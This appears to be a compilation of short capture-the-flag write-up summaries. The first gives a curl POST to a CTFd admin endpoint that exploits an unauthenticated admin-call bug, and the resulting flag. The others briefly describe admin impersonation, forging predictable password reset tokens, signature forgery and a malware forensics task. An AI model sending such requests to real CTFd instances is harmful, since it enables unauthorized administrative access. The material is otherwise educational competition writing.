We can see a recent bugfix to CTFd, preventing unauthed admin calls at https://github.com/CTFd/CTFd/commit/9578355143d7af675fc4776b0f2de802be91e261.
We make a POST request to it with cURL with: curl -da=a https://ctf.isis.poly.edu/admin/chal/new.
We get back the flag: flag{at_least_it_isnt_php}.
Unwrap the flag (remove the flag{} around it), and we get the solution: at_least_it_isnt_php.
Here, I had to find a way to get the admin flag from a memorial website. The site assigns regular visitors random usernames, but the flag is restricted to admins only. I needed to figure out how to trick the system into believing I was the administrator.
In this chal, I was given a compromising an admin account on a website. I had to figure out how password reset tokens were generated and create a valid one to hijack the account. The hint suggested that the tokens were generated using predictable patterns based on timestamps and email addresses.
In this challenge, we visited a "Sign Smith" shop that used a fancy cryptographic protocol to verify customers. Our goal was to forge a signature to prove we were allowed to pick up the flag, even though the shop refused to sign any message containing the word "flag."
The is a forensics challenge where a user accidentally ran a mal program hidden among 1000 other numbered programs (1.exe to 1000.exe) in a folder on their desktop. Instead of manually checking each program, they ran all of them and captured the system logs to analyze which one behaved suspiciously.